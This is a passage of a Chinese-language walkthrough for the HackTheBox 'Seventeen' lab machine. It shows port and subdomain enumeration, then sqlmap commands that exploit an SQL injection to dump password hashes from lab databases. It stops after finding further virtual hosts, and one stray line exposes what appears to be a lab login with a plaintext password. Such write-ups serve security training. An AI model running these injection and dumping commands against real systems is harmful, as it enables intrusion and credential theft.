Skip to content

艰难的机器 艰难的开始

Synopsis

一堆虚拟主机,都添加了一些最终的落地执行,站点中有一个基于布尔值的SQL注入,获取对数据库的访问。其中会泄漏另一个虚拟主机和他的数据库,旧管理系统提供的文件上传,并泄漏 Roundcube 网络邮件实例中的主机名。上传一个 Webshell 并利用 Roundcube 中的 CVE-2020-12640 来包含并执行。通过流氓 NPM 服务器安装恶意 Node 模块获得root权限之前,密码重用有两个关键点。

Skills Required

  • Enumeration
  • SQL injection
  • Source code review

Skills Learned

  • PHP file inclusion,
  • Npm usage.
  • Npm registry(Npm注册表)

Enumeration

$ ports=$(nmap -p- --min-rate=1000 -T4 10.10.11.165 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
$ nmap -p$ports -sC -sV 10.10.11.165

Nmap扫描显示三个端口开放,22 运行 SSH 服务,80 和 8000 上运行不同版本的 Apache 服务。由于目前没有 SSH 凭证,我们应该分别访问并枚举 80, 8000 端口。

Apache - Port 8000

![[Pasted image 20220925224118.png]]

Apache - Port 80

静态页面,痛过爬虫、目录扫描后未发现利用点。使用 ffuf 扫描子域名,发现 exam.seventeen.htb

$ ffuf -H 'Host: FUZZ.seventeen.htb' -u 'http://seventeen.htb' -w /usr/share/seclists/Discovery/Web-Content/raft small-directories-lowercase.txt -fw
2760

________________________________________________

 :: Method           : GET
 :: URL              : http://seventeen.htb
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt
 :: Header           : Host: FUZZ.seventeen.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response words: 2760
________________________________________________

exam                    [Status: 200, Size: 17375, Words: 3222, Lines: 348, Duration: 51ms]
:: Progress: [17770/17770] :: Job [1/1] :: 1879 req/sec :: Duration: [0:00:21] :: Errors: 0 ::

写入本地 hosts 文件解析

$ echo "10.10.11.165 exam.seventeen.htb" | sudo tee -a /etc/hosts

使用 searchsploit 搜索 exam 系统相关漏洞

$ searchsploit exam manager system
------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                              |  Path
------------------------------------------------------------------------------------------------------------ ---------------------------------
Exam Hall Management System 1.0 - Unrestricted File Upload (Unauthenticated)                                | php/webapps/50103.php
Exam Hall Management System 1.0 - Unrestricted File Upload + RCE (Unauthenticated)                          | php/webapps/50111.py
Exam Reviewer Management System 1.0 - Remote Code Execution (RCE) (Authenticated)                           | php/webapps/50726.txt
Exam Reviewer Management System 1.0 - ‘id’ SQL Injection                                                    | php/webapps/50725.txt
------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

没有凭据,优先考虑不需要身份验证的漏洞。查看如何能够利用SQL注入漏洞,文件中已列出payload信息,注入点为参数 id

$ searchsploit -x /php/webapps/50725.txt
# Exploit Title: Exam Reviewer Management System 1.0 - <E2><80><98>id<E2><80><99> SQL Injection
# Date: 2022-02-18

<SNIP>

*SQLMAP COMMAND*
*# sqlmap -u "127.0.0.1/erms/?p=take_exam&id=1
<http://127.0.0.1/erms/?p=take_exam&id=1>" -p id --dbs --level 3*

sqlmap

$ sqlmap -u "http://exam.seventeen.htb/p=take_exam&id=1" -p id --dbs --level 3 --batch  #获取库名
<SNIP>
available databases [4]:
[*] db_sfms
[*] erms_db
[*] information_schema
[*] roundcubedb

$ sqlmap -u "http://exam.seventeen.htb/?p=take_exam&id=1" -p id --dbs --level 3 --batch - D db_sfms --tables

[3 tables]
+---------+
| user    |
| storage |
| student |
+---------+

$ sqlmap -u "http://exam.seventeen.htb/p=take_exam&id=1" -p id --dbs --level 3 --batch -D db_sfms -T student --threads=10 --dump

Database: db_sfms                                                                                                                            
Table: student
[4 entries]
+---------+----+--------+---------+----------+----------------------------------------------------+-----------+
| stud_id | yr | gender | stud_no | lastname | password                                           | firstname |
+---------+----+--------+---------+----------+----------------------------------------------------+-----------+
| 1       | 1A | Male   | 12345   | Smith    | 1a40620f9a4ed6cb8d81a1d365559233                   | John      |
| 2       | 2B | Male   | 23347   | Mille    | abb635c915b0cc296e071e8d76e9060c                   | James     |
| 3       | 2C | Female | 31234   | Shane    | a2afa567b1efdb42d8966353337d9024 (autodestruction) | Kelly     |
| 4       | 3C | Female | 43347   | Hales    | a1428092eb55781de5eb4fd5e2ceb835                   | Jamie     |
+---------+----+--------+---------+----------+----------------------------------------------------+-----------+

上级目录/ver/www 下文件夹 oldmanagement 可以猜测是否为另一个虚拟主机

$ sqlmap -u "http://exam.seventeen.htb/p=take_exam&id=1" -p id --dbs --level 3 --batch -D erms_db -T users --threads=10 --dump
Database: erms_db
Table: users
[3 entries]
+----+------+-----------------------------------+----------+----------------------------------+------------------+--------------+---------------------+------------+---------------------+
| id | type | avatar                            | lastname | password                         | username         | firstname    | date_added          | last_login | date_updated        |
+----+------+-----------------------------------+----------+----------------------------------+------------------+--------------+---------------------+------------+---------------------+
| 1  | 1    | ../oldmanagement/files/avatar.png | Admin    | fc8ec7b43523e186a27f46957818391c | admin            | Adminstrator | 2021-01-20 14:02:37 | NULL       | 2022-02-24 22:00:15 |
| 6  | 2    | ../oldmanagement/files/avatar.png | Anthony  | 48bb86d036bb993dfdcf7fefdc60cc06 | UndetectableMark | Mark         | 2021-09-30 16:34:02 | NULL       | 2022-05-10 08:21:39 |
| 7  | 2    | ../oldmanagement/files/avatar.png | Smith    | 184fe92824bea12486ae9a56050228ee | Stev1992         | Steven       | 2022-02-22 21:05:07 | NULL       | 2022-02-24 22:00:24 |
+----+------+-----------------------------------+----------+----------------------------------+------------------+--------------+---------------------+------------+---------------------+

$ echo '10.129.227.143 oldmanagement.seventeen.htb' | sudo tee -a /etc/hosts

获取一个登陆页面,使用学号➕密码登陆,前面sqlmap跑出来的密码可以登陆。 ![[Pasted image 20220929163252.png]] 有一可以下载的pdf和文件上传功能,查看pdf文件,得到mastermailer.seventeen.htb虚拟主机 ![[Pasted image 20220929163718.png]]

$ echo '10.129.119.55 mastermailer.seventeen.htb' | sudo tee -a /etc/hosts

IP: 10.129.119.55 parrot: htb-ovuln@htb-q8thfpvb4i.htb-cloud.com 7R6iTapk

题解

做题过程